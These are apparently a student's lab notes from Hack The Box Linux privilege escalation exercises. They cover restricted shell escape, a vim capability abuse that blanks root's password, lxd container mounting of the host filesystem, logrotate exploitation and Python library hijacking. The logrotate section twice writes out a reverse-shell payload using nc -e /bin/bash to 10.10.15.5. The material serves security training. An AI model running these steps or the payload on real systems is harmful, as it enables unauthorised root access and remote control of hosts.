
HTB Linux Priv Esc


LINUX PRIVILEGE ESCALATION

ESCAPING RESTRICTED SHELLS:


htb-user@ubuntu:~$ while read line; do
> echo $line;
> done <flag.txt
HTB{35c4p3_7h3_r3stricted_5h311}
htb-user@ubuntu:~$

CAPABILITIES
htb-student@ubuntu:~$ cat /etc/passwd | head -n1
root:x:0:0:root:/root:/bin/bash
htb-student@ubuntu:~$ /usr/bin/vim.basic /etc/passwd
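*** vim.basic can write /etc/passwd as an unprivileged user only if the binary carries a file capability that bypasses permission checks; the transcript does not show it, `getcap /usr/bin/vim.basic` would confirm ***
*** delete the x in that line using VIM and save with :x! (an empty password field leaves root without a password) ***
*** to audit a host for this, list file capabilities with `getcap -r / 2>/dev/null` and clear any that are not needed with `setcap -r <file>` ***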
htb-student@ubuntu:~$ cat /etc/passwd | head -n1
root::0:0:root:/root:/bin/bash
htb-student@ubuntu:~$ su root
root@ubuntu:/home/htb-student# whoami
root
root@ubuntu:/home/htb-student# cd /
root@ubuntu:/# ls
bin cdrom etc lib lib64 lost+found mnt proc run snap sys usr
boot dev home lib32 libx32 media opt root sbin srv tmp var
root@ubuntu:/# cd root
root@ubuntu:~# ls
flag.txt snap
root@ubuntu:~# cat flag.txt
HTB{c4paBili7i3s_pR1v35c}

CONTAINERS:
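htb-student@ubuntu:~$ id
uid=1000(htb-student) gid=1000(htb-student) groups=1000(htb-student),116(lxd)
*** the lxd group is the relevant finding: as the steps below show, a member can create a privileged container and mount the host's / inside it, so lxd group membership should be treated as root-equivalent and granted accordingly ***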
htb-student@ubuntu:~$ cd ContainerImages
htb-student@ubuntu:~/ContainerImages$ ls
alpine-v3.18-x86_64-20230607_1234.tar.gz
htb-student@ubuntu:~/ContainerImages$ lxc image import alpine-v3.18-x86_64-20230607_1234.tar.gz --alias Alpine
htb-student@ubuntu:~/ContainerImages$ lxc image list
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+-------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+-------------------------------+
| Alpine | b14f17d61b9d | no | alpine v3.18 (20230607_12:34) | x86_64 | CONTAINER | 3.62MB | Jun 23, 2023 at 11:44pm (UTC) |
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+-------------------------------+
htb-student@ubuntu:~/ContainerImages$ lxc init Alpine privesc -c security.privileged=true
Creating privesc
htb-student@ubuntu:~/ContainerImages$ lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
Device host-root added to privesc
htb-student@ubuntu:/$ lxc exec privesc /bin/bash
Error: Command not found
htb-student@ubuntu:/$ lxc exec privesc /bin/sh
~ # whoami
root
~ # cd /
/ # find / -name flag.txt
~~~ lots and lots of "Permission denied" errors like the ones below ~~~
/mnt/root/root/flag.txt <----- FOUND IT!
find: /proc/sys/fs/binfmt_misc: Permission denied
find: /sys/kernel/tracing: Permission denied
find: /sys/kernel/debug: Permission denied
find: /sys/kernel/config: Permission denied
/ # cat /mnt/root/root/flag.txt
HTB{C0nT41n3rs_uhhh}

LOGROTATE

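htb-student@ubuntu:~$ logrotate --version
logrotate 3.11.0
*** the version matters: the logrotten tool used further down depends on a log-rotation race reported against specific logrotate releases, and it also needs a log directory the unprivileged user can write to. Keeping logrotate patched and log directories writable only by root removes both conditions. ***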
htb-student@ubuntu:~$ cat /etc/logrotate.conf
cat: /etc/logrotate.conf: No such file or directory
htb-student@ubuntu:~$ find / -name logrotate.conf 2>/dev/null
/snap/lxd/24918/etc/logrotate.conf
/snap/lxd/23889/etc/logrotate.conf
htb-student@ubuntu:~$ cat /snap/lxd/24918/etc/logrotate.conf
/var/snap/lxd/common/lxd/logs/lxd.log {
copytruncate
rotate 7
delaycompress
compress
notifempty
missingok
minage 1
}
htb-student@ubuntu:~$ cat /snap/lxd/23889/etc/logrotate.conf
/var/snap/lxd/common/lxd/logs/lxd.log {
copytruncate
rotate 7
delaycompress
compress
notifempty
missingok
minage 1
}

echo "if [ \`id -u\` -eq 0 ]; then (/bin/nc -e /bin/bash 10.10.15.5 9001 &); fi"
> /home/htb-student/backups/access.log.1

Python Library Hijacking

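def virtual_memory():
    """Return the platform layer's memory statistics and cache the total.

    Calls ``_psplatform.virtual_memory()``, stores the ``total`` attribute of
    the result in the module-level ``_TOTAL_PHYMEM``, and returns the result
    object unchanged.

    NOTE(review): the listing was pasted without indentation; it is restored
    here so the function is valid Python. In this walkthrough the function
    is presumably the library code that a privileged script imports. The
    hijacking risk depends on whether the file defining it is writable by
    non-root users, so check that file's ownership and mode.
    """
    global _TOTAL_PHYMEM
    ret = _psplatform.virtual_memory()
    # cached for later use in Process.memory_percent()
    _TOTAL_PHYMEM = ret.total
    return ret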

echo "if [ `id -u` -eq 0 ]; then (/bin/nc -e /bin/bash 10.10.15.5 9001 &); fi" >
payloadfile

./logrotten -p ./payload /home/htb-student/backups/access.log

ls -l /etc/bash_completion.d/

find / -name mem_stats.py 2>/dev/null
